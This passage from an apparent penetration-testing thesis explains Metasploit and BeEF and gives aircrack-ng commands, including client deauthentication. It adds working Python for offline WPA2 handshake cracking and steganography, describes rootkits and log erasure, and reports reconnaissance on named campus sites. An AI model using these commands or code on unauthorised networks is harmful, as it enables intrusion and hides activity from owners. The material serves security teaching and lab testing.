Screenshot of the Ophcrack password cracking interface

Figure 3.24

3.6. Vulnerability Exploitation Tools


Before knowing the functions of the Metasploit framework, you have to know some basic terms
of hacking.

Vulnerability: A flaw or weakness in system security procedures, design or
implementation that could be exploited, resulting in notable damage. Vulnerability within
a system lies with poor coding, bugs, or misconfiguration. These are the points where
hackers or pen testers try to drive a wedge in so they can gain access to a system.

Exploit: A piece of software that takes advantage of a bug or vulnerability, leading to
privilege escalation or Denial of Service (DoS) attacks on the target. An exploit is designed
to take advantage of a flaw or vulnerability in a computer system. To explain in other
terms, exploitation would be similar to using a lock pick on a door to gain access to a
house.

Overflow: An error caused when a program tries to store data beyond its size. May be used
by an attacker to execute malicious code.

Payload: The actual code which runs on the compromised system after exploitation.

Auxiliary: Provides additional functionality like fuzzing, scanning, DoS attacks, recon,
etc. An auxiliary module scans for banners or OSs, fuzzes, or performs a DoS attack on the target. It
doesn't inject a payload like an exploit, meaning you won't be able to gain access to a system using
an auxiliary module.

Encoders are used to obfuscate modules to avoid detection by a protection mechanism
such as an antivirus or a firewall. This is widely used when we create a backdoor. The
backdoor is encoded (even multiple times) and sent to the victim.

Shellcode is a set of instructions used as a payload when exploitation occurs. Shellcode is
typically written in assembly language. In most cases, a command shell or a Metasploit
shell will be provided after the series of instructions have been performed by the target
machine.

A Listener listens for connections from a payload injected into a compromised system.

Post, as the name suggests: these modules are used for post-exploitation. After a system has
been compromised, we can dig deeper into the system or set it as a pivot to attack other
systems using these modules.

NOPs (No Operation) are popularly known from the x86 processor. This is related to shellcode
and machine language instructions. Briefly, NOPs prevent a program from crashing while
using jump statements in its shellcode. NOPs kind of loop the machine language
instruction from the beginning if it lands in an invalid memory location after issuing a
jump statement, thus preventing the payload from crashing.

Here is a brief block diagram of the architecture of Metasploit

Figure 3.25 Metasploit architecture

Metasploit is an open source penetration testing framework, used for developing and executing
attacks against target systems. It has a huge database of exploits; it can also be used to write our
own exploits.
Metasploit exploitation is a very simple concept. The structure of an exploit is essentially the
exploit combined with a payload. The exploit is what is used to leverage the vulnerability to gain
access, and the payload is what is thrown at the distant machine once the hole has been
created by the exploit.
Metasploit comes with a variety of interfaces, which are enumerated as follows;
Msfconsole: an interactive curses-like shell to do all tasks.
Msfcli: calls msf functions from the terminal/command line itself.
Msfgui: the Metasploit framework graphical user interface.
Armitage: another graphical tool, written in Java, to manage pen tests performed with msf.

A meterpreter shell or a root-level shell on the target is often the goal, as it will allow you the
privileges and functionality to do whatever you want. This could include data extraction,
malware transfer, backdoor creation or lateral movement to another machine on the network.

3.7 Wireless Attack Tools.


There are numerous types of wireless attacking tools; however, I am narrowing it to only two,
which are;

Aircrack-ng is a suite of tools that allows you to monitor, gather packets, inject them and finally
crack a network's key in order to gain access. Nearly all wireless networks now use WPA2 for
security, as you will see WEP security just won't meet the requirement any more.
Most wireless networks will use either WEP or WPA; to be able to crack either of these, you will
need a wireless card that can both monitor and inject packets. These are the common
step-by-step procedures for using the aircrack-ng tool.

Step 1: Setting up your wireless card

In order to capture network traffic without associating with the target access point, we need to set
our wireless network card in monitor mode. To do this, open a terminal window and type:
iwconfig
This will list all wireless network interfaces and their current status. In a Linux environment
wlan0 represents the wireless interface card. Next you will want to run the command
airmon-ng start wlan0 in the terminal.
This will set that wireless interface (wlan0) into monitor mode. If you run iwconfig again
you will see what looks like another device has appeared; in my case it appears as mon0. This is
just the monitoring side of your wireless card that we will use for the next step.

Step 2: Monitoring available access points

Now that you have your wireless card in monitor mode, let's check out what Access Points
(APs) are available in our area by running this command: airodump-ng mon0

Figure 3.25

As mentioned in step 1, you will now use mon0 instead of wlan0 to monitor the networks.
Running airodump-ng activates a passive listening mode where we can see all Access Points
available to you and some details about them. All you need to do now is to select a target of your
choice; once you have done that, note down its channel and BSSID (MAC address). It is handy
to note down any station that is associated with the same BSSID.

Step 3: Capturing data

WEP is easy to crack compared to WPA-PSK. This is due to the fact that we only need to
capture between 20k and 40k interesting packets. Cracking WPA-PSK is a little harder as we
need to carry out a dictionary attack on a captured handshake between the access point and the
associated client. To capture data from a single access point, we run this command;
airodump-ng -c 6 --bssid 00:0f:cd:45:74:55 -w HackThis mon0

Figure 3.27

This is a breakdown of the command we just used:
-c 6: capture data on channel 6 only
--bssid 00:0f:cd:45:74:55: the MAC address of our target's access point
-w HackThis: save captured packets into a file called HackThis in the current directory
mon0: the wireless adaptor that we use to carry out the data capture

Step 4: How to increase traffic

The time taken to capture the data from the target network can vary depending on how many
users are connected and whether they are actively using it. Sometimes you may need to speed up this
process, as users are inactive and it would take hours to gather the number of packets required to
crack the key.
This is where injecting packets comes into play. By injecting packets you will increase the traffic
on the wireless network, which in turn will reduce the time required to capture the quantity of
data we need.
To carry out the next step, you will have to open another terminal window and type the
command: aireplay-ng -3 -b 00:0f:cc:7d:67:00 -h 00:a5:14:2f:a5:d0 -x 50 wlan0
-3: type of attack, in our case ARP request replay
-b: MAC address of the access point
-h: MAC address of the associated client from airodump-ng
-x 50: limited to sending 50 packets per second
wlan0: again, our wireless network interface

Figure 3.28

Step 5: Cracking the WEP key

As mentioned earlier, WEP cracking is the easiest to do, as you only need to collect a certain
amount of data. To crack the WEP key, run the following command: aircrack-ng HackThis.cap
Remember that you require around 20k to 40k packets; you can sometimes do it with
around 10k packets if the target only has a short key/password.

Step 6: Cracking WPA or WPA2 PSK

Cracking WPA is similar to WEP up to the point where you are gathering packets. This time you
have to wait, because what this cracking process needs is a successful capture of the four-way
handshake association between the access point and the client machine. To do this, you set the
capture going as in step 3 and then either wait for a device to authorize with the access point or
deauthenticate a client so that they have to reconnect, essentially booting them off their own
network for a fraction of time and then capturing the handshake when they reconnect. To
deauthenticate a client, you carry out the following command in a separate terminal:
aireplay-ng --deauth 3 -a APMAC -c ClientMAC mon0
APMAC is the MAC address of the access point
ClientMAC is the MAC address of the associated client

Step 7: Cracking the WPA key

Once you have captured a four-way handshake, you will need a large dictionary file; then
you can run this command: aircrack-ng -w wordlist capture_HackThis
wordlist is your dictionary file and capture_HackThis is a .cap file with a valid WPA handshake.
The length of time it will take to crack a WPA key is based on the length of the target's password
and the size of your wordlist/dictionary file.
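What step 7 repeats for every wordlist entry is the WPA key derivation, and that derivation is what decides how long the attack takes and whether a wordlist can succeed at all. The following added example (not from the thesis, and not aircrack-ng's code) derives the Pairwise Master Key with PBKDF2-HMAC-SHA1 as 802.11i specifies, runs a constructed wordlist against a constructed target, and measures the per-guess cost; SSIDs, passphrases and wordlist are constructed, the "IEEE"/"password" vector is the IEEE 802.11i known-answer test.

```python
"""Added example (not from the thesis): the key-derivation step that step 7's
dictionary attack has to repeat for every guess. A WPA/WPA2-PSK passphrase is
never used directly; the Pairwise Master Key is PBKDF2-HMAC-SHA1(passphrase,
SSID, 4096 iterations, 32 bytes). Each wordlist entry therefore costs 4096
HMAC rounds, and the result is bound to one SSID, so a table precomputed for
one SSID is useless against another. SSIDs, passphrases and wordlist below are
constructed; the "IEEE"/"password" vector is the IEEE 802.11i known answer."""
import hashlib
import hmac
import time

PBKDF2_ITERATIONS = 4096


def derive_pmk(passphrase, ssid):
    """Return the 256-bit PMK for a passphrase/SSID pair."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, 32)


def wordlist_search(target_pmk, ssid, wordlist):
    """What a handshake attack reduces to: derive a PMK per guess and check it.
    aircrack-ng verifies each candidate against the captured handshake MIC
    rather than a known PMK; the per-guess cost is the same.
    Returns (matching passphrase or None, number of guesses made)."""
    for n, guess in enumerate(wordlist, 1):
        if hmac.compare_digest(derive_pmk(guess, ssid), target_pmk):
            return guess, n
    return None, len(wordlist)


def guesses_per_second(ssid, sample=20):
    """Rough single-core rate, to size what a wordlist attack can cover."""
    t0 = time.perf_counter()
    for i in range(sample):
        derive_pmk("benchmark-%d" % i, ssid)
    return sample / (time.perf_counter() - t0)


# Constructed wordlist standing in for a real dictionary file.
WORDLIST = ["password", "letmein", "qwerty123", "summer2014", "welcome1"]

if __name__ == "__main__":
    ssid = "HomeNet"  # constructed SSID
    weak = derive_pmk("summer2014", ssid)
    print("weak passphrase:", wordlist_search(weak, ssid, WORDLIST))
    strong = derive_pmk("k7#Qp9!vLm2zR", ssid)
    print("strong passphrase:", wordlist_search(strong, ssid, WORDLIST))
    rate = guesses_per_second(ssid)
    print("about %.0f guesses/s on this core: a 10-million-word list takes %.1f hours"
          % (rate, 1e7 / rate / 3600))
```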

Fern WiFi Cracker


Fern Wifi Cracker is a wireless security auditing and attack software program written using the
Python programming language and the Python Qt GUI library; the program is able to crack and
recover WEP/WPA/WPS keys and also run other network-based attacks on wireless or Ethernet-based
networks.
These are the steps for using the Fern Wi-Fi Cracker that comes with Kali Linux. The illustration for
using the Fern tool is cracking a device connected to a network.

Step 1: Setting up your Wi-Fi adaptor in monitor mode

Open a terminal window and type: airmon-ng start wlan0

Figure 3.29

Step 2: Launch Fern Wi-Fi Cracker


Once the Fern is launched, click on the select interface as seen below

Figure 3.30

Now, if your wireless card successfully entered monitor mode in the first step, you should see
the following below;

Figure 3.31

Step 3: Detecting a network to crack


Click the top button highlighted below to activate the search; your results will be displayed as
WEP or WPA networks as seen below. You then click on the relevant button, for example WPA:

Figure 3.32

Step 4: Select a network to crack


Click on your chosen network, then ensure that you click Regular Attack, browse to your
dictionary file and select it, then wait for the program to find a client to deauth.

Figure 3.33
The program has a wordlist (file path seen below), but it is not great; you will want to have your
own network to crack with strong passwords.

Figure 3.34

Step 5: Attack the network


Once you have selected a wordlist file (highlighted below as common.txt) and a client MAC to
deauth, you can run your attack;

Figure 3.35
As you can see below, the wordlist common.txt does not contain the password, so you will need to
either use a different wordlist or update this one.

Figure 3.36


To save time, I updated the wordlist with the password of the network, and as seen below the key has been cracked.

Figure 3.37
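What Fern (and aircrack-ng behind it) does with every wordlist entry can be reproduced offline. The following Python is an added example written for this section, not code from the thesis or from Fern: it derives the PMK from each candidate passphrase with PBKDF2, expands it to the KCK, recomputes the MIC of the second handshake message and compares it with the captured one. The handshake below (SSID AIT-LAB, MAC addresses, nonces and EAPOL frame) is constructed in memory for a lab network; on a real test the same values come from the capture file.

```python
"""Offline WPA2-PSK dictionary attack against a captured 4-way handshake.

Added example, not part of the thesis or of Fern WiFi Cracker. All handshake
material below is CONSTRUCTED for a lab network; nothing was captured from a
real access point.
"""
import hashlib
import hmac
from dataclasses import dataclass


@dataclass
class Handshake:
    ssid: bytes
    ap_mac: bytes      # authenticator (AP) address
    sta_mac: bytes     # supplicant (client) address
    anonce: bytes      # 32-byte nonce from message 1
    snonce: bytes      # 32-byte nonce from message 2
    eapol: bytes       # EAPOL-Key frame of message 2 with the MIC field zeroed
    mic: bytes         # 16-byte MIC captured in message 2


def pmk(passphrase: str, ssid: bytes) -> bytes:
    # IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ptk_kck(pmk_: bytes, hs: Handshake) -> bytes:
    # PRF-512 over "Pairwise key expansion"; only the first 128 bits (the KCK)
    # are needed to verify the MIC.
    b = (min(hs.ap_mac, hs.sta_mac) + max(hs.ap_mac, hs.sta_mac)
         + min(hs.anonce, hs.snonce) + max(hs.anonce, hs.snonce))
    ptk = b"".join(
        hmac.new(pmk_, b"Pairwise key expansion\x00" + b + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:16]


def mic_for(kck: bytes, eapol: bytes) -> bytes:
    # WPA2 (CCMP, key descriptor version 2): MIC = HMAC-SHA1 over the EAPOL frame, truncated to 128 bits
    return hmac.new(kck, eapol, hashlib.sha1).digest()[:16]


def candidate_matches(passphrase: str, hs: Handshake) -> bool:
    kck = ptk_kck(pmk(passphrase, hs.ssid), hs)
    return hmac.compare_digest(mic_for(kck, hs.eapol), hs.mic)


def crack_wpa2(hs: Handshake, wordlist):
    """Return the first passphrase in the wordlist that reproduces the captured MIC, else None."""
    for word in wordlist:
        word = word.strip()
        # WPA passphrases are 8..63 characters; anything else cannot be the key
        if 8 <= len(word) <= 63 and candidate_matches(word, hs):
            return word
    return None


def lab_handshake(passphrase: str) -> Handshake:
    """Build a CONSTRUCTED handshake whose MIC was produced with the given passphrase."""
    hs = Handshake(
        ssid=b"AIT-LAB",
        ap_mac=bytes.fromhex("001122334455"),
        sta_mac=bytes.fromhex("66778899aabb"),
        anonce=bytes(range(32)),
        snonce=bytes(range(32, 64)),
        eapol=b"\x01\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 109,   # shape only, not a real frame
        mic=b"\x00" * 16,
    )
    hs.mic = mic_for(ptk_kck(pmk(passphrase, hs.ssid), hs), hs.eapol)
    return hs


if __name__ == "__main__":
    hs = lab_handshake("correct horse battery")
    print(crack_wpa2(hs, ["password", "12345678", "letmein1"]))    # None: the wordlist misses
    print(crack_wpa2(hs, ["password", "correct horse battery"]))   # correct horse battery
```

Each candidate costs 4096 HMAC-SHA1 iterations, which is why the quality of the wordlist decides the outcome, as the failure with common.txt above shows, and why real cracks are run with aircrack-ng or hashcat on a GPU rather than in pure Python. Nothing here talks to the network: once the handshake is captured, the attack is entirely offline and the access point never sees the guesses.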

3.8. Browser Exploitation Framework (BeEF)


BeEF, the Browser Exploitation Framework, is an open source penetration testing tool that focuses on browser-based vulnerabilities. That makes BeEF extremely useful to social engineers who lure victims to fake websites.
The BeEF social engineering framework can be categorized as shown in the picture below:


Figure 3.38

The diagram groups BeEF with the Social-Engineer Toolkit, but BeEF is a stand-alone project. It is used to host a malicious website (or to inject its JavaScript hook into a page through a cross-site scripting flaw) that is then visited by internet users. The hook turns each visiting browser into a "zombie" that polls the BeEF server for commands; the commands are executed inside the victim's web browser and their results are reported back to the server.
When the attacker logs into the BeEF server, he or she can run modules against a specific hooked browser. Any module can be executed, or the attacker can write a new module, which makes it possible to execute an arbitrary command against the zombie.
BeEF uses browser vulnerabilities to gain control of the target computer system. It provides an API for writing modules that attack the target web browser; the API abstracts the complexity of the hook and makes the quick and effective creation of modules possible.

3.9. Evading Defenses and Erasing Tracks


The most important aspect of hacking, once the attack itself is complete, is making sure that your tracks cannot be traced. One supporting technology is steganography, the art and science of hiding information by embedding messages within other, seemingly harmless messages. Steganography works by replacing bits of useless or unused data in regular computer files, such as graphics, sound, text or HTML, with bits of different, invisible information. This hidden information can be plain text, cipher text or even images.
For obvious reasons, such as avoiding legal trouble and maintaining access, attackers will usually attempt to erase all evidence of their actions. Trojaned versions of system utilities such as ps or netcat are often used to hide the attacker's activity and to erase it from the system log files. Once the trojans are in place, the attacker has likely gained total control of the system. By executing a script in a trojan or rootkit, a variety of critical files are replaced with new versions, hiding the attacker in seconds.


Other techniques include steganography and tunneling. Steganography is the process of hiding data in other data, for instance image and sound files. Tunneling takes advantage of the transmission protocol by carrying one protocol over another. Even the small amount of spare space in a packet's TCP and IP headers can be used for hiding information. An attacker can use the compromised system to launch new attacks against other systems, or as the starting point for another reconnaissance phase.
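The bit replacement the paragraph describes, as an added example for this section and not code from the thesis: the low bit of every 8-bit sample in a constructed grayscale pixel buffer is overwritten with the message bits, so no sample moves by more than one level and the picture is visually unchanged. The 32-bit length header is this example's own framing convention, not a standard, and the cover image is generated in memory so no image file or library is needed.

```python
"""Least-significant-bit steganography over a raw 8-bit sample buffer.

Added example for the thesis section on steganography; not the thesis's own code.
The cover "image" is CONSTRUCTED in memory. Framing: 4-byte big-endian length,
then the message, one bit per sample.
"""
import struct


def _bits(data: bytes):
    """Yield the bits of data, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed(cover: bytes, message: bytes) -> bytes:
    """Hide message in the LSBs of cover; raises if the cover has too few samples."""
    payload = struct.pack(">I", len(message)) + message
    if len(payload) * 8 > len(cover):
        raise ValueError("cover too small: need %d samples" % (len(payload) * 8))
    out = bytearray(cover)
    for i, bit in enumerate(_bits(payload)):
        out[i] = (out[i] & 0xFE) | bit      # replace only the lowest bit
    return bytes(out)


def extract(stego: bytes) -> bytes:
    """Recover the message: read the length header first, then that many bytes."""
    bits = [sample & 1 for sample in stego]

    def take(n_bytes: int, offset: int) -> bytes:
        out = bytearray()
        for i in range(n_bytes):
            byte = 0
            for j in range(8):
                byte = (byte << 1) | bits[offset + i * 8 + j]
            out.append(byte)
        return bytes(out)

    length = struct.unpack(">I", take(4, 0))[0]
    return take(length, 32)


def max_sample_change(cover: bytes, stego: bytes) -> int:
    """Largest change to any sample; LSB embedding never exceeds 1."""
    return max(abs(a - b) for a, b in zip(cover, stego))


# Constructed 64x64 grayscale image: a smooth gradient, no real picture involved
COVER = bytes((x * 7 + 13) % 256 for x in range(4096))

if __name__ == "__main__":
    stego = embed(COVER, b"meet at 0300, gate B")
    print(extract(stego), max_sample_change(COVER, stego))   # b'meet at 0300, gate B' 1
```

The defender's angle follows from the same arithmetic: because only the lowest bit plane is touched, steganalysis tools compare the statistics of that plane against what a natural image produces, and a file-integrity hash of the original (as with the host-based IDS discussed below) flags the modified file outright.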
System administrators can deploy a host-based Intrusion Detection System (IDS) and antivirus software in order to detect trojans and other compromised files and directories; a host-based IDS does this by comparing the current hash of each system file against a trusted baseline taken when the system was known to be clean. As an ethical hacker, you must be aware of the tools and techniques that attackers deploy, so that you are able to advocate and implement countermeasures.
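The host-based check that catches the trojaned ps or netcat described above, as an added example and not code from the thesis or from any IDS product: it hashes every regular file under a directory into a baseline and then reports files whose content, permissions or presence has changed. The directory and its "binaries" are constructed in a temporary folder so the example runs offline; on a real host it would be pointed at /bin, /sbin and /usr/bin, and the baseline must be stored off the box or on read-only media, because a rootkit running as root can rewrite a baseline kept on the same disk.

```python
"""File-integrity baseline and diff, the core of a host-based IDS check.

Added example, not from the thesis. demo() builds a CONSTRUCTED fake /bin so
the code runs without touching a real system.
"""
import hashlib
import json
import os
import tempfile


def file_digest(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> dict:
    """Map relative path -> sha256, size and permission bits for every regular file under root."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            st = os.lstat(full)
            baseline[os.path.relpath(full, root)] = {
                "sha256": file_digest(full),
                "size": st.st_size,
                "mode": oct(st.st_mode & 0o7777),   # includes setuid/setgid bits
            }
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Classify differences; mode changes matter because rootkits add setuid bits."""
    report = {"modified": [], "mode_changed": [], "added": [], "removed": []}
    for rel, meta in baseline.items():
        if rel not in current:
            report["removed"].append(rel)
        elif meta["sha256"] != current[rel]["sha256"]:
            report["modified"].append(rel)
        elif meta["mode"] != current[rel]["mode"]:
            report["mode_changed"].append(rel)
    report["added"] = sorted(set(current) - set(baseline))
    return report


def demo() -> dict:
    """Build a fake /bin, take a baseline, simulate a rootkit, and diff."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "bin"))
    for name in ("ps", "ls", "netstat", "login"):
        with open(os.path.join(root, "bin", name), "wb") as f:
            f.write(b"ELF original " + name.encode())      # constructed stand-in for a binary
    baseline = build_baseline(root)   # in practice: written to off-box or read-only storage

    # Simulated compromise: trojaned ps, a hidden backdoor binary, login made setuid
    with open(os.path.join(root, "bin", "ps"), "wb") as f:
        f.write(b"ELF trojan ps that hides the backdoor pid")
    with open(os.path.join(root, "bin", ".bd"), "wb") as f:
        f.write(b"ELF backdoor")
    os.chmod(os.path.join(root, "bin", "login"), 0o4755)

    return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The check only works if the baseline predates the compromise and is trusted; it says nothing about a kernel-mode rootkit that lies to every file read, which is why the rootkit discussion that follows stresses detection from outside the running system.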
Whenever a hacker performs any activity, from active reconnaissance through the attack phase, that activity is recorded by the compromised machine and the devices around it. The following are capable of recording a hacker's activity:

System log files

File Access Times

Windows Registry Entries

Intrusion Detection System

Proxy Servers

Firewalls

Attackers must therefore study the operating system and application software running on the compromised machine in order to know how to delete the recorded entries.
A rootkit is used to maintain access and to prevent logging of the actions performed on a compromised machine. The term rootkit describes a kit of small, useful programs that allow an attacker to maintain access as root, the most powerful user on a computer. In other words, a rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer.
The most important word in describing a rootkit is undetectable. Most of the technology and tricks employed by a rootkit are designed to hide code and data on a system; for example, many rootkits can hide files and directories. Other features of a rootkit usually provide remote access and eavesdropping, for instance sniffing packets from the network. Combined, these features deliver a knockout punch to security.


Rootkits are often installed by the attacker as soon as he or she gains administrative access to the target machine. Kernel-mode rootkits operate by modifying the kernel of the operating system itself, which makes them really hard to detect; user-mode rootkits instead replace system binaries, as described above.
The main job of a rootkit is to give the attacker continued unauthorized access to the compromised system. Once an attacker has access to the target system he or she may want to revisit it for other malicious activities. In general a rootkit is a group of programs or tools such as sniffers, keyloggers, spyware, remote administration tools, log cleaners, trace removers, etc. A rootkit may also bundle tools to crack administrator-level passwords and to exploit the system's vulnerabilities.
As mentioned earlier, the main motive of a rootkit is to allow repeated access by the attacker to the target system; installing a RAT or backdoor process serves this objective.
To facilitate continued access, a rootkit may disable auditing and edit the event log to hide its presence. Why does an attacker plant a rootkit? The answer is simple: it provides undisputed and uninterrupted access in super-user mode, automatically sniffs important data from the network, can easily hide inside a command or process, and can bypass nearly all security measures once installed.


CHAPTER 4
LABORATORY IMPLEMENTATION DETAILS AND RESULTS

4.0 INTRODUCTION

In this part of the thesis report, a proposed framework for Network Penetration Testing has been designed and implemented on the campus network. The proposed methodology helps when applying it to real-world scenarios. Although the non-commercial open source tools that are available do not offer the full feature set of commercial penetration testing products, they have been used here for profiling the campus network through network penetration testing.
There are many sophisticated software tools; however, the most common ones are used for the implementation and testing in order to ascertain the practicality of the methodology.

4.1 PROPOSED FRAMEWORK FOR NETWORK PENETRATION TESTING

Figure 4.1


Planning and information gathering are the most important phases of any penetration test, so proper time and effort should be given to them. Then, after the discovery and attack phase, which means exploiting any vulnerability, post-exploitation should be done, so that one knows how deep an attacker can go and how much damage can be done to systems and networks. The post-exploitation phase also consists of installing backdoors, rootkits and malicious software on the remote target machine.
After post-exploitation comes the clean-up phase. Here, all the entries or logs created by the test are deleted, so that nobody can tell about the attacker's visit. Finally, the reporting phase documents the vulnerabilities found and the countermeasures recommended for securing the network against attackers.
During the implementation an isolated network was set up within the campus network for finding vulnerabilities and loopholes and then exploiting them for demonstration purposes.

4.2 PLANNING

Planning is the most important aspect of penetration testing or hacking: it is where the methodology is drawn up and the most appropriate software tools are chosen. The operating system to be used is also chosen in this phase. Additionally, if the work in hand is a penetration test, an agreement between the red team company and the client has to be signed in which the scope of the test is outlined, together with security considerations, confidentiality, risks and other aspects such as financial obligations.
Regarding scope, a penetration test should be carefully defined to specify which devices, networks and services are included in the test environment; it states which systems are to be tested during the testing phase. With respect to the scope of a penetration test, three metrics are distinguished, namely full, limited and focused, thereby reducing the complexity and cost of the solution. The time spent on the penetration test is directly linked to the scope of the systems to be investigated.

Details of the three scope metrics are as follows:

A full test systematically examines the overall system. It should be noted that even in a full test certain systems (i.e. outsourced and externally hosted ones) might not be testable.


With a limited penetration test, only the part of the system which forms a logical whole is investigated. For instance, all systems in the DMZ, or the systems comprising an operational or functional unit, can be tested.

With a focused approach, only one part of the system, or just one service within the system, is tested. For instance, this scope is appropriate after a modification or extension of the system landscape. Such a test can only provide information about the part of the system or the service that was tested; it cannot provide general information about the overall security of the system.

4.2.1 REQUIREMENTS FOR A PENETRATION TEST

Before a penetration test is conducted, certain key issues need to be settled in order to ensure useful and timely results. These include the technical requirements: time constraints, coverage of the full range of threats, the range of IP addresses over which the test is to be conducted, the systems that are to be attacked and also those that are not to be attacked as part of the test, and minimal disruption to normal operation. Other requirements may include legal and contractual issues specifying liability, and notification of individuals that the test is taking place. Such requirements can vary depending on the legal structure of the organization or even the host country of the organization.
Besides the above-mentioned requirements, there are a number of ethical and technical competency issues that penetration testers face in conducting tests, such as what to do with systems or protocols not explicitly included in or excluded from a test. Although codes of conduct and best practices are laid out by numerous professional bodies, in actual practice the penetration tester is often required to take an informed decision in a particular situation. Therefore, the tester should possess the necessary procedural, ethical and technical training to ensure that penetration tests are conducted correctly and do not lead to a false or misleading sense of security.


4.3 INFORMATION OR INTELLIGENCE GATHERING

The information or intelligence gathering phase is essential to understand the type and amount of information available before the actual test. Intelligence gathering ranges from passive information gathering, through active information gathering, to the targeted scanning of the systems and network.
In a laboratory network within the campus area network, intelligence gathering was carried out by network surveying, port scanning and operating system (OS) fingerprinting. Nmap was used extensively because it gives a lot of flexibility in specifying targets. Nmap was used to identify how many hosts reside within the network and their associated IP addresses. Following the proposed framework for penetration testing, the next aspect of information gathering is the use of the Maltego software tool.

4.3.1 Maltego
Maltego is an active reconnaissance tool for gathering information: its transforms resolve names and query the target, so the attacker's or pen-tester's actions can be traced. The tool can be used to enumerate the technologies (web server, modules, scripting languages) running on the server that is to be scanned.
Using this tool to enumerate the technologies running on the websites listed below:
A. www.ait-open.net


Figure 4.2

This is an actual, safe practical test which reveals the programs running in the background on the server. Looking critically at the graph, many programs point to the server with arrows; these are the background components the server is built on, meaning that the server uses the following technology:


Figure 4.3

1. OpenSSL
2. Mod_ssl 2.8.31
3. PHP software
4. OpenSSL 0.9.8
5. Limited Modules
6. GZIP Module
7. Mod_ssl
8. DAV
9. Apache
10. Adobe Active content
11. Unix Operating System
12. Apache 1.3

B. portal.hopoly.edu.gh


Gathering information about the Ho Polytechnic school management system (portal.hopoly.edu.gh), we can see the many programs the server is built with to achieve its aim; these background programs are shown in figure 4.4 below:

Figure 4.4

The programs comprises the following;

Portal.hopoly.edu.gh (the website)

OpenSSL 0.9.8

OpenSSL

Perl

Win32 Header

Apache 2.2

Mod_ssl

DAV

jQuery

Apache


PHP

Last but not least among Maltego's many functions, the display below shows the conversion of the website to a domain, its resolution to an IP address, and the links into and out of the website.

Figure 4.5

The IP address of www.ait-open.net is 96.127.151.44, an IPv4 address, and the various websites which link into and out of it are as follows:

Ait-open.net (as domain)

www.microsoft.com

www.livezilla.net

fonts.googleapis.com

www.oum.edu.my

Capl.oum.edu.my

Egate.oum.edu.my

www2.oum.edu.my

www.purplemathplus.com


You can manage the number of websites displayed in the graph, which can generate the IP addresses of the sites, where each site is hosted, and so on.
To conclude, Maltego is good for intelligence gathering: it gives a general overview of the server, the applications running on it, the IP address, the location where the site is hosted, and the number of sites connected to other sites through APIs for information sharing.

4.4 SCANNING AND VULNERABILITY ASSESSMENT

4.4.1 Network Mapper (Nmap)

Service and network mapping tools are used to analyze systems, networks, services and open ports. The basic purpose of such a tool is to examine firewall rules or the responses given to different real or crafted IP packets.
Nmap can be used to scan for what hosts are available on the network, what services those hosts are offering, what operating systems are running, what packet filters/firewalls are in use, and dozens of other characteristics.
The output from Nmap is a list of scanned targets with supplemental information on each, depending on the options used. The port table gives the key information: it lists the port number and protocol, the service name, and the state. The state is either open, filtered, closed or unfiltered. Open means that a service on the target host is listening for connections/packets on that port. Filtered means that a firewall, filter or other network obstacle is blocking the port, so that Nmap cannot tell whether it is open or closed. Closed ports have no application listening on them, though they could open up at any time. Unfiltered ports respond to Nmap's probes, but Nmap cannot determine whether they are open or closed; only the ACK scan, which is used for mapping firewall rules, reports this state. Note that an open port is an exposure, not in itself a vulnerability; whether it is exploitable depends on the service and version behind it.
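Nmap's grepable output format (-oG) carries exactly the port table described above, one line per host. The following Python is an added example, not code from the thesis or from Nmap: it parses such a line, counts the ports by state and flags one telling port combination. The sample line is constructed here from the 22 open ports the thesis reports for 10.27.65.61 further on, with two filtered and one closed port added for illustration; the domain-controller rule is the editor's own heuristic, not an Nmap feature.

```python
"""Turn Nmap grepable output (-oG) into a port table and classify the ports.

Added example, not from the thesis. SAMPLE is a CONSTRUCTED -oG line; in the
lab, `nmap -sS -p- -oG scan.gnmap 10.27.65.61` writes a real file in this format.
"""
import re
from collections import Counter

SAMPLE = (
    "Host: 10.27.65.61 (ftpserver.hopolycomputerscience.com)\tPorts: "
    "53/open/tcp//domain///, 80/open/tcp//http///, 88/open/tcp//kerberos-sec///, "
    "135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 389/open/tcp//ldap///, "
    "445/open/tcp//microsoft-ds///, 464/open/tcp//kpasswd5///, 593/open/tcp//http-rpc-epmap///, "
    "636/open/tcp//ldapssl///, 1025/open/tcp//NFS-or-IIS///, 1026/open/tcp//LSA-or-nterm///, "
    "1028/open/tcp//unknown///, 1040/open/tcp//netsaint///, 1047/open/tcp//neod1///, "
    "1048/open/tcp//neod2///, 1077/open/tcp//imgames///, 3268/open/tcp//globalcatLDAP///, "
    "3269/open/tcp//globalcatLDAPssl///, 3389/open/tcp//ms-wbt-server///, "
    "5800/open/tcp//vnc-http///, 5900/open/tcp//vnc///, 21/filtered/tcp//ftp///, "
    "22/filtered/tcp//ssh///, 23/closed/tcp//telnet///\tIgnored State: closed (65510)"
)

# One -oG port entry: port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/([a-z|]+)/(tcp|udp)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")

STATE_MEANING = {
    "open": "a service is listening",
    "closed": "reachable, nothing listening",
    "filtered": "probe dropped by a firewall or filter; open or closed unknown",
    "unfiltered": "reachable (ACK scan) but open or closed unknown",
}


def parse_gnmap(text: str) -> dict:
    """Return {host: [record, ...]} for every Host line that carries a Ports field."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
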